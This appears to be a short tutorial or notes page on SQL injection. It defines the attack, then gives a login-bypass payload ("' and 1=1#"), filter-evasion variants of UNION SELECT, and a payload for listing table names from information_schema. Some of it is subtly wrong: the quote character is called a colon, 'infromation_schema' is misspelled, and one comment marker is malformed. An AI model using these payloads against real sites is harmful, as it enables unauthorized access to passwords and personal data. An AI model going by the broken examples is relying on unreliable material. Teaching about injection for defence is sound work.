SQL Injection
What is SQL?
SQL stands for Structured Query Language.
Most website use a database to store data
Data like usernames, passwords, credit cards, post and so on, are stored in a database.
What is an SQL Injection?
Allows an attacker to interfere with the queries that an application makes to its database.
A successful SQL injection attack can result in unauthorized access to sensitive data, such as passwords, credit card details, or personal user information.
SQL Injection Login Bypassing
Seeing the following we are trying to inject SQL commands to bypass this login successfully.
In this bypass we're doing, we put a colon after the password "123456" and we use " 'and 1=1# " to inject our SQL command
1=1 it will take it like is True, and we will be able to bypass this login page.
After that we will successfully login as papishampoo.
More Information and examples in:
💉pageSQL InjectionBypassing Filters
Bypass blacklisted spaces:
+
/**/
comment = %23
Bypassing queries:
uNiOn+SElect+1,2+%23
UniOn/**/SeLecT/**/%23
Example:
-1'UniOn/**/SeLecT/**/1,table_name/**/from/**/infromation_schema.tables/**/where/**table_schema/**/=/**/' <table_name> '%23
Last updated